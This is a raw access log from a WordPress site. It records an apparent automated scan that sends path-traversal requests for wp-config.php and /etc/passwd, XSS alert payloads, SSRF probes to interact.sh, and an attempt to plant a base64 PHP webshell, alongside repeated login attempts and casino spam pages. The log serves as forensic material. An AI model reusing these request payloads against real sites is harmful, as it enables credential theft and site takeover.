147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php-backup HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.19"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /_wpeprivate/config.json HTTP/1.1" 301 423 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.original HTTP/1.1" 301 423 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.OLD HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.inc HTTP/1.1" 301 423 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.old HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.save HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.BAK HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.html HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.12 (KHTML, like Gecko) Version/17.3 Safari/617.12"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.old HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /.wp-config.php.swp HTTP/1.1" 301 423 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.txt HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.backup HTTP/1.1" 301 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config-backup.txt HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.7.18"
85.155.190.233 - - [30/Jul/2026:16:29:41 +0000] "POST /wp-cron.php?doing_wp_cron=1785428980.9674420356750488281250 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.dist HTTP/1.1" 301 423 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php_orig HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0"
147.182.222.217 - - [30/Jul/2026:16:29:41 +0000] "GET /wp-config.php.orig HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15"
147.182.222.217 - - [30/Jul/2026:16:29:54 +0000] "GET /wp-content/plugins/gallery-plugin/upload/files/zoofa.png HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:55 +0000] "GET /wp-content/uploads/3HE0ZWKtfVUI9IKlc6BC2l88uBk.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20"
147.182.222.217 - - [30/Jul/2026:16:29:56 +0000] "GET /common/config.php.new HTTP/1.1" 301 423 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /wp-config.php.bk HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /config.php.zip HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.18"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /config.php.new HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /config.php.tar.gz HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /home/moonbloomwallsWORDPRESS.txt HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25"
147.182.222.217 - - [30/Jul/2026:16:29:57 +0000] "GET /home/moonbloomwalls-WORDPRESS.txt HTTP/1.1" 301 423 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
85.155.190.233 - - [30/Jul/2026:16:31:41 +0000] "POST /wp-cron.php?doing_wp_cron=1785429101.2247169017791748046875 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
103.86.108.235 - - [30/Jul/2026:16:31:41 +0000] "POST /wp-login.php HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:143.0) Gecko/20100101 Firefox/143.0"
85.155.190.233 - - [30/Jul/2026:16:31:41 +0000] "POST /wp-cron.php?doing_wp_cron=1785429101.2247169017791748046875 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
103.86.108.235 - - [30/Jul/2026:16:31:41 +0000] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:143.0) Gecko/20100101 Firefox/143.0"
85.155.190.233 - - [30/Jul/2026:16:36:35 +0000] "POST /wp-cron.php?doing_wp_cron=1785429395.0239160060882568359375 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
147.182.222.217 - - [30/Jul/2026:16:36:35 +0000] "GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
43.157.179.227 - - [30/Jul/2026:16:36:41 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-17/ HTTP/1.1" 200 27792 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
147.182.222.217 - - [30/Jul/2026:16:37:32 +0000] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:34 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
147.182.222.217 - - [30/Jul/2026:16:37:37 +0000] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
147.182.222.217 - - [30/Jul/2026:16:37:42 +0000] "GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
147.182.222.217 - - [30/Jul/2026:16:37:42 +0000] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
147.182.222.217 - - [30/Jul/2026:16:37:43 +0000] "GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
147.182.222.217 - - [30/Jul/2026:16:37:43 +0000] "GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
85.155.190.233 - - [30/Jul/2026:16:37:44 +0000] "POST /wp-cron.php?doing_wp_cron=1785429464.0205690860748291015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
147.182.222.217 - - [30/Jul/2026:16:37:44 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:44 +0000] "GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15"
147.182.222.217 - - [30/Jul/2026:16:37:44 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:45 +0000] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:45 +0000] "GET /register/?redirect_to=https://interact.sh/ HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
147.182.222.217 - - [30/Jul/2026:16:37:46 +0000] "GET /wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo HTTP/1.1" 400 433 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.18"
147.182.222.217 - - [30/Jul/2026:16:37:47 +0000] "GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 302 432 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:47 +0000] "GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 302 432 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:48 +0000] "GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
147.182.222.217 - - [30/Jul/2026:16:37:48 +0000] "GET /wp-content/uploads/prime-mover-export-files/1/ HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/25.0.1 Version/17.4.1 Safari/605.1.15"
147.182.222.217 - - [30/Jul/2026:16:37:49 +0000] "GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1" 400 433 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:37:49 +0000] "GET /wp-admin/admin-ajax.php?action=directorist_author_pagination HTTP/1.1" 400 433 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.5.19"
85.155.190.233 - - [30/Jul/2026:16:38:14 +0000] "POST /wp-cron.php?doing_wp_cron=1785429494.0444130897521972656250 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
156.59.62.133 - - [30/Jul/2026:16:38:14 +0000] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0.0.0 Safari/537.36"
156.59.62.133 - - [30/Jul/2026:16:38:14 +0000] "POST /wp-login.php HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0.0.0 Safari/537.36"
85.155.190.233 - - [30/Jul/2026:16:43:30 +0000] "POST /wp-cron.php?doing_wp_cron=1785429810.4897119998931884765625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
201.218.34.57 - - [30/Jul/2026:16:43:30 +0000] "GET / HTTP/1.1" 200 37104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.168.38.50 - - [30/Jul/2026:16:43:33 +0000] "GET /wp-login.php HTTP/1.1" 200 2473 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
102.91.92.79 - - [30/Jul/2026:16:43:36 +0000] "POST /wp-login.php HTTP/1.1" 302 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
102.91.92.79 - - [30/Jul/2026:16:43:38 +0000] "GET /wp-admin/ HTTP/1.1" 200 61685 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
197.2.13.135 - - [30/Jul/2026:16:43:41 +0000] "GET /wp-admin/post-new.php HTTP/1.1" 200 197606 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
168.196.232.108 - - [30/Jul/2026:16:43:43 +0000] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 57222 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.155.190.233 - - [30/Jul/2026:16:46:05 +0000] "POST /wp-cron.php?doing_wp_cron=1785429965.8884909152984619140625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
66.249.64.226 - - [30/Jul/2026:16:46:05 +0000] "GET /2024/01/20/vavada-kazino-ofitsial-nyi-sait/feed/ HTTP/1.1" 200 1259 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.186 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.224 - - [30/Jul/2026:16:46:08 +0000] "GET /2026/02/05/choosing-the-right-game-for-your-50-crowns-casino-experience/feed/ HTTP/1.1" 200 1326 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.186 Mobile Safari/537.36 (compatible; GoogleOther)"
147.182.222.217 - - [30/Jul/2026:16:46:15 +0000] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
147.182.222.217 - - [30/Jul/2026:16:46:15 +0000] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
147.182.222.217 - - [30/Jul/2026:16:46:15 +0000] "GET /?aam-media=wp-config.php HTTP/1.1" 301 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:46:27 +0000] "GET /web_shell_cmd.gch HTTP/1.1" 301 423 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
147.182.222.217 - - [30/Jul/2026:16:46:35 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/ HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:46:43 +0000] "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15"
147.182.222.217 - - [30/Jul/2026:16:46:44 +0000] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
147.182.222.217 - - [30/Jul/2026:16:46:47 +0000] "GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
147.182.222.217 - - [30/Jul/2026:16:46:47 +0000] "GET /wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/ HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
147.182.222.217 - - [30/Jul/2026:16:46:48 +0000] "GET /wp-json/wp/v2/sfwd-assignment HTTP/1.1" 404 537 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.19"
85.155.190.233 - - [30/Jul/2026:16:47:09 +0000] "POST /wp-cron.php?doing_wp_cron=1785430029.7930328845977783203125 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
43.161.234.148 - - [30/Jul/2026:16:47:09 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-16/ HTTP/1.1" 200 27630 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
147.182.222.217 - - [30/Jul/2026:16:47:21 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 433 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
147.182.222.217 - - [30/Jul/2026:16:47:22 +0000] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4"
147.182.222.217 - - [30/Jul/2026:16:47:32 +0000] "GET /wp-content/uploads/ao_ccss/queuelog.html HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:47:33 +0000] "GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1" 301 423 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
147.182.222.217 - - [30/Jul/2026:16:47:38 +0000] "GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
147.182.222.217 - - [30/Jul/2026:16:47:40 +0000] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:47:49 +0000] "GET /blog/wp-content/uploads/ao_ccss/queuelog.html HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
147.182.222.217 - - [30/Jul/2026:16:47:50 +0000] "GET /wp-content/backups-dup-lite HTTP/1.1" 301 423 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.86.108.235 - - [30/Jul/2026:16:48:08 +0000] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:143.0) Gecko/20100101 Firefox/143.0"
85.155.190.233 - - [30/Jul/2026:16:48:08 +0000] "POST /wp-cron.php?doing_wp_cron=1785430088.6737380027770996093750 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
103.86.108.235 - - [30/Jul/2026:16:48:08 +0000] "POST /wp-login.php HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/17.0 Safari/605.1.15"
85.155.190.233 - - [30/Jul/2026:16:53:33 +0000] "POST /wp-cron.php?doing_wp_cron=1785430413.3090150356292724609375 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
216.73.216.31 - - [30/Jul/2026:16:53:33 +0000] "GET /robots.txt HTTP/1.1" 200 744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Jul/2026:16:53:33 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-13/ HTTP/1.1" 200 27600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
147.182.222.217 - - [30/Jul/2026:16:55:02 +0000] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
85.155.190.233 - - [30/Jul/2026:16:55:03 +0000] "POST /wp-cron.php?doing_wp_cron=1785430503.0352840423583984375000 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
147.182.222.217 - - [30/Jul/2026:16:55:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 433 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
216.73.216.31 - - [30/Jul/2026:16:55:09 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-12/feed/ HTTP/1.1" 200 1332 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Jul/2026:16:55:09 +0000] "GET /?p=796 HTTP/1.1" 301 423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.31 - - [30/Jul/2026:16:55:10 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-12/ HTTP/1.1" 200 27664 "https://moonbloomwalls.com/?p=796" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
147.182.222.217 - - [30/Jul/2026:16:55:17 +0000] "POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
147.182.222.217 - - [30/Jul/2026:16:55:18 +0000] "POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/3HE0ZWsdeYQyv53AbwvIX42NRBG.php HTTP/1.1" 400 433 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
147.182.222.217 - - [30/Jul/2026:16:55:32 +0000] "GET /wp-content/uploads/simple-file-list/fdbfeii.php HTTP/1.1" 404 181 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
147.182.222.217 - - [30/Jul/2026:16:55:33 +0000] "POST /wp-admin/admin-ajax.php?0=M0hFMFpZYVJIN1JUMUFXdkp2TzViTUZEdkQ0 HTTP/1.1" 400 433 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
43.134.91.35 - - [30/Jul/2026:16:56:26 +0000] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmoonbloomwalls.com%2F2026%2F02%2F22%2Fwhat-makes-wishwin-casino-a-good-choice-for-newbies%2F&format=xml HTTP/1.1" 200 3000 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.155.190.233 - - [30/Jul/2026:16:56:26 +0000] "POST /wp-cron.php?doing_wp_cron=1785430586.6159369945526123046875 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
85.155.190.233 - - [30/Jul/2026:16:58:38 +0000] "POST /wp-cron.php?doing_wp_cron=1785430718.0118410587310791015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
156.59.62.133 - - [30/Jul/2026:16:58:38 +0000] "POST /wp-login.php HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0.0.0 Safari/537.36"
